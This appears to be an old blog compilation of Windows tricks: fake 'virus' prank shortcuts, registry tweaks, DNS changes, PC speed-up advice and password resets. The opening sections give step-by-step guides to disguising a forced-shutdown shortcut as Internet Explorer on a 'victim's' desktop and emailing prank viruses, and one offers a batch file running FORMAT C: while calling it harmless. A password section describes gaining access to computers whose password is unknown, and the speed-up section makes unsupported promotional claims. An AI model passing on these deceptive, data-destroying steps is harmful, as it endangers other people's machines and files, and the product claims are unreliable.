Create Simple Harmless Virus
  • Delete any "Internet Explorer" icons or shortcuts that are on your victim's desktop.
  • Right-click on the desktop and select New > Shortcut. This will bring up the Create Shortcut Wizard.
  • In the Create Shortcut Wizard, it asks for the location of the item. Enter the following into the text box, without the parentheses: (shutdown -s -t 30 -c "THIS IS A VIRUS!"). This is a simple Windows script that initiates a standard shutdown. The "-s" indicates a shutdown, the "-t" is the timer value in seconds, and the "-c" is the comment value. You can replace the 30 with another number and THIS IS A VIRUS! with a message of your choosing. Once you have entered the shutdown command, click next.
  • The Create Shortcut Wizard will then ask for a shortcut name. Enter "Internet Explorer" into the text box, then click Finish. Your fake virus is now created, but now it's time to disguise it...
  • On the desktop, right-click on the new "Internet Explorer" shortcut and select Properties. Under the Shortcut tab, click the "Change Icon" button. If a pop-up appears saying that the shortcut contains no icons, simply click OK to continue.
  • Find the blue "e" Internet Explorer icon, click on it, then click OK. Click OK once again to exit the Properties window.
  • You’re done. Now whenever your victim tries to access the Internet by double-clicking the fake icon on the desktop, the computer will display the virus message then shut down!

Make Virus
DO NOT RELEASE THESE VIRUSES.

·         DIY (very) Basic Batch Script That Does Essentially Nothing
please note new title. You may wish to skip to the next step.

What you should do here is to open a window of notepad. Enter
FORMAT C:
and save the file as disk_destroyer_basic.bat.

This won't spread or do anything fancy. It will just wipe your hard disk. There are a few quirks to be worked out with this method, but like I said, informational purposes only.

How to Create a Fake and Harmless Virus

If you're a prankster and would like to pull a trick on your computer-literate friends, then you can create a fake and harmless virus and email it to them. The easiest harmless viruses you can make are the ones that shut down a computer or monitor after a specified amount of time, open and close a CD drive or log the user out of Windows XP.
·        Right click your mouse on your desktop. Select "new" from the drop-down menu and then click on "shortcut."
·        Type the command you'd like the computer to perform in the shortcut wizard box. For example, if you want the computer to shut down, you'd type "shutdown." Type it all in lower case letters as one word.
·        Add the amount of time you want the command to be performed after the shortcut has been clicked. This will typically be in seconds. After the word "shutdown," add a space, the letter "s" for seconds, another space, then the letter "t" for time. Add another space and then type in the amount of seconds you'd like.
·        Create a place for a comment to show up when the fake virus is activated. After you've typed in the amount of seconds, press the space bar, a hyphen and then a lowercase "c." Type your message in quotation marks.
·        Hit the "Next" button at the bottom of the shortcut wizard box. The next window that pops up in the wizard will be one to name the shortcut. Give your fake computer virus a realistic name. Click on the "Finish" button and your fake virus will appear on your desktop.

How to Find Out a Remote IP

Internet Protocols (IPs) are unique addresses given to each computer on the Internet. The IP address can be retrieved using the "ping" command available in the Windows command prompt. The ping command uses the name given to the domain or the local computer on your network. The ping command takes the name, uses the domain name servers (DNS) to look up the IP address and returns it to you, so you can determine the IP address of a remote machine.
Instructions
·        Click the Windows "Start" button and select "Run." Enter "cmd" into the text box displayed and press the "Ok" button. This starts the Windows command prompt.
·        Enter "ping " into the command prompt, and press the "Enter" key. Replace "" with the name of the remote computer. This sends a small packet to the domain, and the IP address and response is sent back to the command prompt window.
·        View the results from the ping command. The remote machine's IP address is shown in the first line for the results.

Tips & Warnings
·        You can also find the IP address for a remote machine on your local network. Type "ping " into the command prompt, replacing "" for the computer name of the network computer.

How to Convert XP Home to XP Pro

Converting your system from XP Home to XP Professional can be accomplished through the use of a simple registry hack. This hack will trick the computer into believing that it has an installation of XP Professional, as both operating systems use essentially identical files for many different features. This is a perfectly legal operation so long as you have a valid product key for WindowsXP, as you will not actually be obtaining any of the bonus features of Windows XP Pro.

·        Open the "Start" menu, click on the "Run" button, type in "regedit," and press "Enter."
·        Open the "HKEY_LOCAL_MACHINE" folder, open the "System" folder, open the "ControlSet00X" folder (the ControlSet folder with the highest number), open the "Control" folder," and open the "Product Options" folder
·        Click on the "ProductSuite" key and press "Delete."
·        Right click in the right-hand pane and select the option to create a "New" "DWORD."
·        Name the DWORD "Brand" and set it to a value of "0."
·        Reboot the computer to complete the change.

Retrieve your lost password

If you have ever lost your password, this is another way to open up XP so you can change your password.
·         The very first thing you want to do when you are hacking your version of XP is to turn on your computer. Once the BIOS POST test is over, start pressing F8. This will allow you to bring XP into safe mode.
·         After you have gotten XP load boot in safe mode, go into your control panel and select the user icon. From here you are going to create a new computer administrator account. If you try to change your password from at this time, it will not let you because your are not the Administrator of that account.
·         Now that you have created a new account, reboot the computer and let it start normally. Once your computer has booted normally go ahead and open the new account.
·         Once you have opened the new account, you will need to open up the control panel again and open up the user account and now you can change the password to your other account.

How to Change User Information ?
On a regular basis, people ask me questions about changing user information, the information you provided when you installed Windows. You can change it. Both of the following values are in the key
HKLM\SOFTWARE\Microsoft\Windows NT\ CurrentVersion
>>RegisteredOrganization.
The name of the organization (Change this to your desired organization)
>>RegisteredOwner. The name of the user (Change this to your desired name)
These changes are reflected in the system instantaneously and requies no reboot. You can confirm this by seeing the system properties(Right-Click on “My Computer” icon and select properties).
Both are REG_SZ values. Changing the registered organization and owner names doesn’t affect installed applications. However, applications that you install after changing these values are likely to pick up the new names.

How to Edit Start Menu ?
Windows has a nice new Start menu, which you can customize more thoroughly than you could with the Start menu in any earlier version of Windows. Open the Taskbar And Start Menu Properties dialog box by right-clicking the taskbar and clicking Properties. On the Start Menu tab, select either the Start Menu option or the Classic Start Menu option to choose which version of the Start menu to use, and then click Customize. The Customize Start Menu dialog box appears; you use this box to customize how Windows displays the Start menu.
The following sections describe the most useful Start menu hacks. First you learn how to configure what does and does not appear on the Start menu. Then you learn how to prevent some programs from appearing on the frequently used programs list. You also learn how to restore the Start menu’s sort order when it’s not in alphabetical order.
Configuring the Menu’s Contents
Even though you can completely customize the Start menu in the user interface, power users and IT professionals will likely want to script Start menu customizations. Power users don’t want to reconfigure the Start menu every time they install Windows. IT professionals can use scripts to deploy these settings or configure them automatically when creating default user profiles.
If you want to script these settings, you need to know where to find them in the registry. All these settings are in the same place:

HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\Advanced

The first section, “Classic Start Menu,” contains values that affect the classic Start menu. The second section, “New Start Menu,” contains values that affect the new Start menu, also known as the Start panel. Most of these settings are REG_DWORD values, but some are REG_SZ values. If the possible data for any of the settings includes 0×01, 0×02, and so on, that setting is a REG_DWORD value. If the possible data includes NO or YES, it’s a REG_SZ value.

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:
208.67.222.222
208.67.220.220
Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.
SPEED UP YOUR PC

Are you fed up with your slow PC? Well you can Speed Up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I ’ll split this post into 2 parts.
1. Automatic Ways to Speed Up PC (Using PC Speed Up Software)
2. Manual Ways to Speed Up PC

Automatic Ways to Speed Up PC

You can use a PC Optimizer Tool to automatically boost the Speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix upto 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the start up etc. This can speed up your PC and Internet speed by upto 3 times. Here are some of the best PC Optimizer Programs that I recommend.
Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.

Manual Ways to Speed Up Your PC

1. Free Up Disk Space to increase the speed of your PC
§                  Remove temporary Internet files.
§                  Empty the Recycle Bin.
§                  Remove Windows temporary files.
§                  Uninstall Programs that you no longer use.
2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.
3. Clean Up your Registry (Highly Recommended)
Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately you cannot do this manually. You have to use a Registry Cleaner to do this. Here is the best registry cleaner on the web.
A complete review of registry cleaners can be found at Registry Cleaner Comparison
4. Clean Up the browser cache to Speed Up your Internet.
Spywares can really hurt the performance of your PC. So, install a good anti-spyware to protect your PC from spywares and improve the speed of your PC. I recommend the following Antispywares to protect your PC.

Which is the Best Way to Speed Up my PC? (Auto or Manual)

The best way to speed Up your PC is by using a PC Optimizer such as Perfect Optimizeror Registry Easy. This is because, manual ways can only perform 30-40% of the tweaks to improve the speed of your PC, but the most important aspect of the Speed Up process such as Registry clean Up and other advanced performance tweaks can only be done using a PC Optimizer software. So if you are serious about improving the speed of your PC, then you need to use a PC Optimizer.
LEGAL NOTICE
If your PC has multiple users then you can now display legal notice to every user before they login to your PC. This legal notice will be displayed at every startup just before the Desktop is loaded. Using this you can tell your friends about the do’s and dont’s in your computer when they login in your absence. Well you can do this pretty easily. For this there is one small registry hack. Here is the step-by-step instruction to do this.

1. Go to Start->Run, type regedit and hit ENTER
2. Navigate to the following key in the registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\system
On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption.
3. Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in it’s size so that it can include a set of do’s and dont’s for your computer.
4. After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on both XP and Vista. You can also try it on Windows 7 and should work with no problems.
Hope you like this post. Pass your comments.

•RESET THE ADMINISTRATOR PASSWORD•

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
§                  You do not need to know the old password to set a new one
§                  Will detect and offer to unlock locked or disabled out user accounts!
§                  There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
